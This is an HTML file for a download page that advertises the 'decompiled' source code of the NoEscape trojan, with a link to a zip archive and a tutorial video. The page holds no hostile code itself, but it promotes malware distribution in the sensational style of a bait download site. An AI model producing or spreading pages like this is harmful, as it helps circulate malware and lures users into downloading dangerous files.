27 lines
851 B
HTML
27 lines
851 B
HTML
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>Free & Fast Downloads | fast-dl.xyz</title>
|
|
|
|
<style>
|
|
body {
|
|
background-image: url("images/background.png");
|
|
|
|
}
|
|
</style>
|
|
</head>
|
|
|
|
<body>
|
|
<center>
|
|
<h1>Fast & Free Downloads</h1>
|
|
<p>NoEscape is a trojan creepypasta made by Enderman in 2020. Many people would love to download its source code, but unfortunately it's closed-source...<br>until TODAY! Our good collaborator Noobes has decompiled and unpacked the trojan and so we present the fresh download link for it. Download <b>NOESCAPE</b> free source code RIGHT NOW (click the link below)</p>
|
|
|
|
<font size=15><a href="noescape-code.zip">DOWNLOAD NOW</a></font>
|
|
|
|
<h2>Video tutorial (how to download):</h2>
|
|
<video controls>
|
|
<source src="\media\how-to-download.mp4" type="video/mp4">
|
|
</video>
|
|
</center>
|
|
</body>
|
|
</html> |